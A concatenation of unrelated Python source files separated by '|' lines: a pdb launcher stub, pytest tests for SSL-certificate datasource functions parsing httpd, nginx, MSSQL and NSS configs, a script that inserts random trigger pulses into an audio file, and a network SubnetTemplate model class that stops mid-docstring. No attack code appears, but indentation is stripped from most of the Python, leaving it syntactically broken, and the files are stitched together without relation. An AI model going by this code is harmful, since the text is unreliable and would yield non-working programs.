# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
import pdb
pdb.main()
|
|
import pytest
from insights.core.dr import SkipComponent
from insights.tests import context_wrap
from insights.combiners.httpd_conf import _HttpdConf, HttpdConfTree
from insights.combiners.nginx_conf import _NginxConf, NginxConfTree
from insights.parsers.mssql_conf import MsSQLConf
from insights.specs.datasources.ssl_certificate import (
httpd_ssl_certificate_files, nginx_ssl_certificate_files,
mssql_tls_cert_file, httpd_certificate_info_in_nss
)
HTTPD_CONF = """
listen 80
listen 443
IncludeOptional "/etc/httpd/conf.d/*.conf"
""".strip()
HTTPD_SSL_CONF = """
<VirtualHost *:443>
## SSL directives
SSLEngine on
SSLCertificateFile "/etc/pki/katello/certs/katello-apache.crt"
SSLCertificateKeyFile "/etc/pki/katello/private/katello-apache.key"
SSLCertificateChainFile "/etc/pki/katello/certs/katello-server-ca.crt"
SSLVerifyClient optional
SSLCACertificateFile "/etc/pki/katello/certs/katello-default-ca.crt"
SSLVerifyDepth 3
SSLOptions +StdEnvVars +ExportCertData
</VirtualHost>
""".strip()
HTTPD_SSL_CONF_2 = """
<VirtualHost *:443>
## SSL directives
ServerName a.b.c.com
SSLEngine on
SSLCertificateFile "/etc/pki/katello/certs/katello-apache.crt"
SSLCertificateKeyFile "/etc/pki/katello/private/katello-apache.key"
SSLCertificateChainFile "/etc/pki/katello/certs/katello-server-ca.crt"
SSLVerifyClient optional
SSLCACertificateFile "/etc/pki/katello/certs/katello-default-ca.crt"
SSLVerifyDepth 3
SSLOptions +StdEnvVars +ExportCertData
</VirtualHost>
<VirtualHost *:443>
## SSL directives
ServerName d.c.e.com
SSLEngine on
SSLCertificateFile "/etc/pki/katello/certs/katello-apache_d.crt"
SSLCertificateKeyFile "/etc/pki/katello/private/katello-apache_d.key"
SSLCertificateChainFile "/etc/pki/katello/certs/katello-server-ca_d.crt"
SSLVerifyClient optional
SSLCACertificateFile "/etc/pki/katello/certs/katello-default-ca_d.crt"
SSLVerifyDepth 3
SSLOptions +StdEnvVars +ExportCertData
</VirtualHost>
<VirtualHost *:443>
## SSL directives
ServerName f.g.e.com
SSLEngine off
SSLCertificateFile "/etc/pki/katello/certs/katello-apache_e.crt"
SSLCertificateKeyFile "/etc/pki/katello/private/katello-apache_e.key"
SSLCertificateChainFile "/etc/pki/katello/certs/katello-server-ca_e.crt"
SSLVerifyClient optional
SSLCACertificateFile "/etc/pki/katello/certs/katello-default-ca_e.crt"
SSLVerifyDepth 3
SSLOptions +StdEnvVars +ExportCertData
</VirtualHost>
""".strip()
HTTPD_CONF_WITHOUT_SSL = """
<VirtualHost *:80>
ServerName a.b.c.com
</VirtualHost>
""".strip()
HTTPD_SSL_CONF_NO_VALUE = """
<VirtualHost *:443>
## SSL directives
SSLEngine off
SSLCertificateFile ""
SSLCertificateKeyFile ""
SSLCertificateChainFile ""
</VirtualHost>
""".strip()
NGINX_CONF = """
http {
listen 80;
listen 443;
include /etc/nginx/conf.d/*.conf;
}
""".strip()
NGINX_SSL_CONF = """
server {
ssl_certificate "/a/b/c.rsa.crt";
ssl_certificate_key "/a/b/c.rsa.key";
ssl_certificate "/a/b/c.cecdsa.crt";
ssl_certificate_key "/a/b/c.cecdsa.key";
}
""".strip()
NGINX_SSL_CONF_MULTIPLE_SERVERS = """
server {
listen 443 ssl;
server_name www.example.com;
ssl_certificate "/a/b/www.example.com.crt";
ssl_certificate_key "/a/b/www.example.com.key";
ssl_certificate "/a/b/www.example.com.cecdsa.crt";
ssl_certificate_key "/a/b/www.example.com.cecdsa.key";
}
server {
listen 443 ssl;
server_name www.example.org;
ssl_certificate "/a/b/www.example.org.crt";
ssl_certificate_key "/a/b/www.example.org.key";
}
""".strip()
NGINX_CONF_WITHOUT_SSL = """
server {
server_name 'a.b.c.com';
}
""".strip()
MSSQL_WITH_TLS = """
[sqlagent]
enabled = true
[EULA]
accepteula = Y
[memory]
memorylimitmb = 2048
[network]
tlscert = /tmp/mssql.pem
""".strip()
MSSQL_WITHOUT_TLS = """
[sqlagent]
enabled = true
[EULA]
accepteula = Y
[memory]
memorylimitmb = 2048
""".strip()
HTTPD_NSS_CERT_ENDATE = """
Not After : Mon Jan 18 07:02:43 2038
""".strip()
HTTPD_WITH_NSS = """
Listen 8443
<VirtualHost _default_:8443>
ServerName www.examplea.com:8443
NSSEngine on
NSSCertificateDatabase /etc/httpd/aliasa
NSSNickname testcerta
</VirtualHost>
<VirtualHost :8443>
ServerName www.exampleb.com:8443
NSSEngine on
NSSCertificateDatabase /etc/httpd/aliasb
NSSNickname testcertb
</VirtualHost>
<VirtualHost :8443>
ServerName www.examplec.com:8443
NSSEngine off
NSSCertificateDatabase /etc/httpd/aliasc
NSSNickname testcertc
</VirtualHost>
""".strip()
HTTPD_WITH_NSS_OFF = """
Listen 8443
<VirtualHost _default_:8443>
NSSEngine off
NSSCertificateDatabase /etc/httpd/alias
NSSNickname testcert
</VirtualHost>
""".strip()
def test_httpd_certificate():
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_SSL_CONF, path='/etc/httpd/conf.d/ssl.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker = {
HttpdConfTree: conf_tree
}
result = httpd_ssl_certificate_files(broker)
assert result == ['/etc/pki/katello/certs/katello-apache.crt']
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_SSL_CONF_2, path='/etc/httpd/conf.d/ssl.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker = {
HttpdConfTree: conf_tree
}
result = httpd_ssl_certificate_files(broker)
# "/etc/pki/katello/certs/katello-apache_e.crt" not in the result
assert result == ['/etc/pki/katello/certs/katello-apache.crt', '/etc/pki/katello/certs/katello-apache_d.crt']
def test_nginx_certificate():
conf1 = _NginxConf(context_wrap(NGINX_CONF, path='/etc/nginx/nginx.conf'))
conf2 = _NginxConf(context_wrap(NGINX_SSL_CONF, path='/etc/nginx/conf.d/ssl.conf'))
conf_tree = NginxConfTree([conf1, conf2])
broker = {
NginxConfTree: conf_tree
}
result = nginx_ssl_certificate_files(broker)
assert result == ['/a/b/c.rsa.crt', '/a/b/c.cecdsa.crt']
conf1 = _NginxConf(context_wrap(NGINX_CONF, path='/etc/nginx/nginx.conf'))
conf2 = _NginxConf(context_wrap(NGINX_SSL_CONF_MULTIPLE_SERVERS, path='/etc/nginx/conf.d/ssl.conf'))
conf_tree = NginxConfTree([conf1, conf2])
broker = {
NginxConfTree: conf_tree
}
result = nginx_ssl_certificate_files(broker)
assert result == ['/a/b/www.example.com.crt', '/a/b/www.example.com.cecdsa.crt', '/a/b/www.example.org.crt']
def test_httpd_ssl_cert_exception():
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_CONF_WITHOUT_SSL, path='/etc/httpd/conf.d/no_ssl.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker1 = {
HttpdConfTree: conf_tree
}
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_SSL_CONF_NO_VALUE, path='/etc/httpd/conf.d/no_ssl.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker2 = {
HttpdConfTree: conf_tree
}
    with pytest.raises(SkipComponent):
        httpd_ssl_certificate_files(broker1)
    with pytest.raises(SkipComponent):
        httpd_ssl_certificate_files(broker2)
def test_nginx_ssl_cert_exception():
conf1 = _NginxConf(context_wrap(NGINX_CONF, path='/etc/nginx/nginx.conf'))
conf2 = _NginxConf(context_wrap(NGINX_CONF_WITHOUT_SSL, path='/etc/nginx/conf.d/no_ssl.conf'))
conf_tree = NginxConfTree([conf1, conf2])
broker1 = {
NginxConfTree: conf_tree
}
with pytest.raises(SkipComponent):
nginx_ssl_certificate_files(broker1)
def test_mssql_tls_cert():
conf1 = MsSQLConf(context_wrap(MSSQL_WITH_TLS, path='/var/opt/mssql/mssql.conf'))
broker1 = {
MsSQLConf: conf1
}
result = mssql_tls_cert_file(broker1)
assert result == "/tmp/mssql.pem"
def test_mssql_tls_no_cert_exception():
conf1 = MsSQLConf(context_wrap(MSSQL_WITHOUT_TLS, path='/var/opt/mssql/mssql.conf'))
broker1 = {
MsSQLConf: conf1
}
with pytest.raises(SkipComponent):
mssql_tls_cert_file(broker1)
def test_httpd_certificate_info_in_nss():
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_WITH_NSS, path='/etc/httpd/conf.d/nss.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker = {
HttpdConfTree: conf_tree
}
result = httpd_certificate_info_in_nss(broker)
assert result == [('/etc/httpd/aliasa', 'testcerta'), ('/etc/httpd/aliasb', 'testcertb')]
def test_httpd_certificate_info_in_nss_exception():
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_WITH_NSS_OFF, path='/etc/httpd/conf.d/nss.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker = {
HttpdConfTree: conf_tree
}
with pytest.raises(SkipComponent):
httpd_certificate_info_in_nss(broker)
|
|
# Lint as: python2, python3
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Code to add trigger events to second channel of an audio file.
This code generates a sequence of random event times, and then adds a pulse
at these times to the second channel of an audio file, so that we can trigger
the Natus event box.
To run:
add_trigger \
--input_filename test_data/tapestry.wav \
--output_filename /tmp/tapestry_events.wav --verbose True
--number_of_events 5
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from absl import logging
import numpy as np
import scipy.io.wavfile
import six
from six.moves import range
from google3.pyglib import gfile
FLAGS = flags.FLAGS
flags.DEFINE_string('input_filename', None, 'Input audio filename')
flags.DEFINE_string('output_filename', None, 'Output audio filename')
flags.DEFINE_integer('number_of_events', -1,
                     'Number of events to add (-X for 1 per X seconds).')
flags.DEFINE_boolean('verbose', False, 'Show log messages.')
flags.DEFINE_float('pulse_length', 0.1, 'Length of the pulse (seconds)')
flags.DEFINE_float('pulse_freq', 0, 'Frequency of the pulse (Hz)')
def random_times(duration, number, minimum_interval=0.5, include_zero=True):
"""Return a list of random times with at least the minimum interval between.
Args:
duration: Maximum time for an event (seconds)
number: Desired number of events
minimum_interval: Minimum time between events
include_zero: Whether the first point should be at 0.0
Returns:
    A sorted list of event times, or None if no set of times satisfying the
    constraints could be found.
"""
if (number - 1)*minimum_interval > duration:
raise ValueError('Not enough time for %d events with %gs between them in '
'%gs.' % (number, minimum_interval, duration))
number = int(number) # So array sizes are integers
for _ in range(1000): # Try a bunch of times to get a good set of times.
bucket_of_times = np.random.uniform(low=0, high=duration, size=8*number)
if include_zero:
bucket_of_times[0] = 0.0
while len(bucket_of_times) >= number:
sorted_times = np.sort(bucket_of_times[:number])
intervals = sorted_times[1:number] - sorted_times[0:(number-1)]
# Look for intervals that are too close together.
too_short_indices = np.nonzero(intervals < minimum_interval)
too_short_indices = too_short_indices[0]
if too_short_indices.shape[0]:
# For each time at the end of a too-short interval...
for t in sorted_times[too_short_indices+1]:
# Find the time in the unsorted list
item_index = np.nonzero(np.abs(bucket_of_times - t) <
minimum_interval/10.0)[0]
# Don't remove the event at time zero (if called for).
if include_zero and item_index.shape[0] > 0 and item_index[0] == 0:
item_index = item_index[1:]
# Delete the bad time.
bucket_of_times = np.delete(bucket_of_times, item_index)
if include_zero:
            assert bucket_of_times[0] == 0.0, ('at %g, item_index=%s, %s' %
                                               (t, item_index, bucket_of_times))
else:
return sorted_times
return None
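# A minimal usage sketch (numbers are illustrative):
#   times = random_times(duration=60.0, number=5)
#   # -> e.g. array([ 0. ,  7.3, 21.9, 40.2, 55.6]), or None on failure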
def add_events_to_audio(audio_signal, event_times, fs=16000,
pulse_length=0.1, pulse_freq=0):
"""Add pulses to an audio channel to indicate the event times.
Given a list of event times, add a second channel to the audio_signal that
pulses at the right time. By default the pulses are full-scale positive DC
pulses, but a frequency can be specified to turn them into full-scale tone-
blips.
Args:
audio_signal: a 1D np.ndarray with the audio data
event_times: A list or np.ndarray of event times (largest must be less
than the length of the audio signal.)
fs: sampling frequency of the audio signal.
pulse_length: length of the pulse (or tone blip) in seconds
pulse_freq: if non-zero, the frequency of the tone blip indicating an event.
Returns:
A stereo audio signal, with the original audio in channel (column) 0, and
the tone blips in the second channel. Final size is num_times x 2.
"""
if not isinstance(audio_signal, np.ndarray):
raise TypeError('audio signal must be an np.ndarray')
audio_signal = audio_signal.astype(np.int16)
audio_signal = audio_signal.squeeze()
if len(audio_signal.shape) > 1:
channels = tuple(range(1, len(audio_signal.shape)))
audio_signal = np.mean(audio_signal, axis=channels)
if len(audio_signal.shape) != 1:
raise TypeError('audio signal (after squeezing) must be 1-dimensional.')
if fs < 8000.0: # Make sure it's an audio frequency
raise ValueError('Sampling rate must be at least 8000Hz.')
if not (isinstance(event_times, list) or
isinstance(event_times, np.ndarray)) or len(event_times) < 3:
raise ValueError('event_times must be a list of at least 3 elements.')
audio_length = audio_signal.shape[0]
new_channel = np.zeros((audio_length, 1), dtype=np.int16)
# Cast to an array first: multiplying a Python list by fs would repeat it.
for t in np.asarray(event_times)*fs:
t = int(t)
new_channel[t:t+int(fs*pulse_length)] = 32767 # Largest int16
if pulse_freq > 0: # Convert the pulse into a tone.
new_channel = np.multiply(new_channel,
np.sin(np.reshape(np.arange(audio_length),
(-1, 1))/
float(fs)*2*np.pi*pulse_freq))
stereo_signal = np.concatenate((np.reshape(audio_signal, (-1, 1)),
np.reshape(new_channel, (-1, 1))),
axis=1).astype(np.int16)
return stereo_signal
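# Usage sketch (hypothetical data, not from the original module): mark three
# events in one second of silence at 16kHz and check the output shape.
#
#   silence = np.zeros(16000, dtype=np.int16)
#   stereo = add_events_to_audio(silence, [0.0, 0.4, 0.8], fs=16000,
#                                pulse_length=0.05, pulse_freq=1000)
#   assert stereo.shape == (16000, 2)  # channel 1 carries the tone blips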
def read_audio_wave_file(audio_filename):
"""Reads a WAV file, returning its sampling rate and int16 samples."""
if not isinstance(audio_filename, six.string_types):
raise TypeError('audio_filename must be a string.')
# Use gfile.Open so we can read files from all sorts of file systems.
with gfile.Open(audio_filename) as fp:
[fs, audio_signal] = scipy.io.wavfile.read(fp)
logging.info('Read_audio_file: Read %s samples from %s at %gHz.',
audio_signal.shape, audio_filename, fs)
assert audio_signal.dtype == np.int16
return fs, audio_signal
def write_audio_wave_file(audio_filename, audio_signal, fs):
"""Writes the audio signal to a WAV file at the given sampling rate."""
if not isinstance(audio_filename, six.string_types):
raise TypeError('audio_filename must be a string.')
if not isinstance(audio_signal, np.ndarray):
raise TypeError('audio_signal must be an np.ndarray')
# Use gfile.Open so we can write files to all sorts of file systems.
with gfile.Open(audio_filename, 'w') as fp:
scipy.io.wavfile.write(fp, fs, audio_signal)
logging.info('Write_audio_file: wrote %s samples to %s at %gHz.',
audio_signal.shape, audio_filename, fs)
def main(_):
if FLAGS.verbose:
logging.set_verbosity(logging.INFO)
if FLAGS.pulse_length <= 0.0:
raise ValueError('Pulse length (%g) must be greater than 0.' %
FLAGS.pulse_length)
[audio_fs, audio_signal] = read_audio_wave_file(FLAGS.input_filename)
audio_seconds = audio_signal.shape[0]/float(audio_fs)
if FLAGS.number_of_events < 0:
number = int(audio_seconds)//(-FLAGS.number_of_events)
elif FLAGS.number_of_events == 0:
raise ValueError('Cannot add 0 events.')
else:
number = FLAGS.number_of_events
event_times = random_times(audio_seconds - 2*FLAGS.pulse_length,
number=number,
minimum_interval=0.5,
include_zero=True)
if event_times is None:
raise ValueError('Could not find %d event times that satisfy the '
'constraints.' % number)
logging.info('Adding events at times: %s',
','.join(str(e) for e in event_times))
stereo_signal = add_events_to_audio(audio_signal, event_times, audio_fs,
pulse_length=FLAGS.pulse_length,
pulse_freq=FLAGS.pulse_freq)
write_audio_wave_file(FLAGS.output_filename, stereo_signal, audio_fs)
if __name__ == '__main__':
flags.mark_flags_as_required(['input_filename', 'output_filename'])
app.run(main)
|
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUAddressRangesFetcher
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUGlobalMetadatasFetcher
from .fetchers import NUQOSsFetcher
from .fetchers import NUSubnetsFetcher
from .fetchers import NUEventLogsFetcher
from bambou import NURESTObject
class NUSubnetTemplate(NURESTObject):
""" Represents a SubnetTemplate in the VSD
Notes:
Like domain and zone objects, subnet objects are created in VSD from templates. This object describes the subnet template.
"""
__rest_name__ = "subnettemplate"
__resource_name__ = "subnettemplates"
## Constants
CONST_USE_GLOBAL_MAC_DISABLED = "DISABLED"
CONST_USE_GLOBAL_MAC_ENABLED = "ENABLED"
CONST_MULTICAST_DISABLED = "DISABLED"
CONST_ENCRYPTION_ENABLED = "ENABLED"
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_ENCRYPTION_DISABLED = "DISABLED"
CONST_USE_GLOBAL_MAC_ENTERPRISE_DEFAULT = "ENTERPRISE_DEFAULT"
CONST_DPI_ENABLED = "ENABLED"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
CONST_IP_TYPE_IPV6 = "IPV6"
CONST_DPI_INHERITED = "INHERITED"
CONST_IP_TYPE_IPV4 = "IPV4"
CONST_MULTICAST_ENABLED = "ENABLED"
CONST_MULTICAST_INHERITED = "INHERITED"
CONST_DPI_DISABLED = "DISABLED"
CONST_ENCRYPTION_INHERITED = "INHERITED"
CONST_IP_TYPE_DUALSTACK = "DUALSTACK"
def __init__(self, **kwargs):
""" Initializes a SubnetTemplate instance
Notes:
You can specify all parameters while calling this method.
A special argument named `data` will enable you to load the
object from a Python dictionary
Examples:
>>> subnettemplate = NUSubnetTemplate(id=u'xxxx-xxx-xxx-xxx', name=u'SubnetTemplate')
>>> subnettemplate = NUSubnetTemplate(data=my_dict)
"""
super(NUSubnetTemplate, self).__init__()
# Read/Write Attributes
self._dpi = None
self._ip_type = None
self._ipv6_address = None
self._ipv6_gateway = None
self._name = None
self._last_updated_by = None
self._last_updated_date = None
self._gateway = None
self._address = None
self._description = None
self._netmask = None
self._embedded_metadata = None
self._encryption = None
self._entity_scope = None
self._split_subnet = None
self._creation_date = None
self._proxy_arp = None
self._use_global_mac = None
self._associated_multicast_channel_map_id = None
self._dual_stack_dynamic_ip_allocation = None
self._multicast = None
self._owner = None
self._external_id = None
self.expose_attribute(local_name="dpi", remote_name="DPI", attribute_type=str, is_required=False, is_unique=False, choices=[u'DISABLED', u'ENABLED', u'INHERITED'])
self.expose_attribute(local_name="ip_type", remote_name="IPType", attribute_type=str, is_required=False, is_unique=False, choices=[u'DUALSTACK', u'IPV4', u'IPV6'])
self.expose_attribute(local_name="ipv6_address", remote_name="IPv6Address", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="ipv6_gateway", remote_name="IPv6Gateway", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="name", remote_name="name", attribute_type=str, is_required=True, is_unique=False)
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="gateway", remote_name="gateway", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="address", remote_name="address", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="description", remote_name="description", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="netmask", remote_name="netmask", attribute_type=str, is_required=True, is_unique=False)
self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="encryption", remote_name="encryption", attribute_type=str, is_required=False, is_unique=False, choices=[u'DISABLED', u'ENABLED', u'INHERITED'])
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="split_subnet", remote_name="splitSubnet", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="proxy_arp", remote_name="proxyARP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="use_global_mac", remote_name="useGlobalMAC", attribute_type=str, is_required=False, is_unique=False, choices=[u'DISABLED', u'ENABLED', u'ENTERPRISE_DEFAULT'])
self.expose_attribute(local_name="associated_multicast_channel_map_id", remote_name="associatedMulticastChannelMapID", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="dual_stack_dynamic_ip_allocation", remote_name="dualStackDynamicIPAllocation", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="multicast", remote_name="multicast", attribute_type=str, is_required=False, is_unique=False, choices=[u'DISABLED', u'ENABLED', u'INHERITED'])
self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
# Fetchers
self.address_ranges = NUAddressRangesFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.qoss = NUQOSsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.subnets = NUSubnetsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.event_logs = NUEventLogsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
# Properties
@property
def dpi(self):
""" Get dpi value.
Notes:
determines whether or not Deep packet inspection is enabled
This attribute is named `DPI` in VSD API.
"""
return self._dpi
@dpi.setter
def dpi(self, value):
""" Set dpi value.
Notes:
determines whether or not Deep packet inspection is enabled
This attribute is named `DPI` in VSD API.
"""
self._dpi = value
@property
def ip_type(self):
""" Get ip_type value.
Notes:
IPv4, DUALSTACK or IPv6
This attribute is named `IPType` in VSD API.
"""
return self._ip_type
@ip_type.setter
def ip_type(self, value):
""" Set ip_type value.
Notes:
IPv4, DUALSTACK or IPv6
This attribute is named `IPType` in VSD API.
"""
self._ip_type = value
@property
def ipv6_address(self):
""" Get ipv6_address value.
Notes:
IPv6 range of the subnet. In the case of a zone, this is an optional field that allows users to allocate an IP address range to the zone. The VSD will auto-assign IP addresses to subnets from this range if a specific IP address is not defined for the subnet
This attribute is named `IPv6Address` in VSD API.
"""
return self._ipv6_address
@ipv6_address.setter
def ipv6_address(self, value):
""" Set ipv6_address value.
Notes:
IPv6 range of the subnet. In the case of a zone, this is an optional field that allows users to allocate an IP address range to the zone. The VSD will auto-assign IP addresses to subnets from this range if a specific IP address is not defined for the subnet
This attribute is named `IPv6Address` in VSD API.
"""
self._ipv6_address = value
@property
def ipv6_gateway(self):
""" Get ipv6_gateway value.
Notes:
The IPv6 address of the gateway of this subnet
This attribute is named `IPv6Gateway` in VSD API.
"""
return self._ipv6_gateway
@ipv6_gateway.setter
def ipv6_gateway(self, value):
""" Set ipv6_gateway value.
Notes:
The IPv6 address of the gateway of this subnet
This attribute is named `IPv6Gateway` in VSD API.
"""
self._ipv6_gateway = value
@property
def name(self):
""" Get name value.
Notes:
Name of the current entity (zone, zone template, subnet, etc.). Valid characters are letters, numbers, spaces and the hyphen (-).
"""
return self._name
@name.setter
def name(self, value):
""" Set name value.
Notes:
Name of the current entity (zone, zone template, subnet, etc.). Valid characters are letters, numbers, spaces and the hyphen (-).
"""
self._name = value
@property
def last_updated_by(self):
""" Get last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
""" Set last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
self._last_updated_by = value
@property
def last_updated_date(self):
""" Get last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
return self._last_updated_date
@last_updated_date.setter
def last_updated_date(self, value):
""" Set last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
self._last_updated_date = value
@property
def gateway(self):
""" Get gateway value.
Notes:
The IP address of the gateway of this subnet
"""
return self._gateway
@gateway.setter
def gateway(self, value):
""" Set gateway value.
Notes:
The IP address of the gateway of this subnet
"""
self._gateway = value
@property
def address(self):
""" Get address value.
Notes:
IP address of the subnet defined. In the case of a zone, this is an optional field that allows users to allocate an IP address range to the zone. The VSD will auto-assign IP addresses to subnets from this range if a specific IP address is not defined for the subnet
"""
return self._address
@address.setter
def address(self, value):
""" Set address value.
Notes:
IP address of the subnet defined. In the case of a zone, this is an optional field that allows users to allocate an IP address range to the zone. The VSD will auto-assign IP addresses to subnets from this range if a specific IP address is not defined for the subnet
"""
self._address = value
@property
def description(self):
""" Get description value.
Notes:
A description field provided by the user that identifies the subnet
"""
return self._description
@description.setter
def description(self, value):
""" Set description value.
Notes:
A description field provided by the user that identifies the subnet
"""
self._description = value
@property
def netmask(self):
""" Get netmask value.
Notes:
Netmask of the subnet defined
"""
return self._netmask
@netmask.setter
def netmask(self, value):
""" Set netmask value.
Notes:
Netmask of the subnet defined
"""
self._netmask = value
@property
def embedded_metadata(self):
""" Get embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. At most a maximum number of Metadata objects is returned, based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
return self._embedded_metadata
@embedded_metadata.setter
def embedded_metadata(self, value):
""" Set embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. At most a maximum number of Metadata objects is returned, based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
self._embedded_metadata = value
@property
def encryption(self):
""" Get encryption value.
Notes:
Determines whether or not IPSEC is enabled. Possible values are INHERITED, ENABLED and DISABLED.
"""
return self._encryption
@encryption.setter
def encryption(self, value):
""" Set encryption value.
Notes:
Determines whether or not IPSEC is enabled. Possible values are INHERITED, ENABLED and DISABLED.
"""
self._encryption = value
@property
def entity_scope(self):
""" Get entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
""" Set entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
self._entity_scope = value
@property
def split_subnet(self):
""" Get split_subnet value.
Notes:
Block subnet routes
This attribute is named `splitSubnet` in VSD API.
"""
return self._split_subnet
@split_subnet.setter
def split_subnet(self, value):
""" Set split_subnet value.
Notes:
Block subnet routes
This attribute is named `splitSubnet` in VSD API.
"""
self._split_subnet = value
@property
def creation_date(self):
""" Get creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
return self._creation_date
@creation_date.setter
def creation_date(self, value):
""" Set creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
self._creation_date = value
@property
def proxy_arp(self):
""" Get proxy_arp value.
Notes:
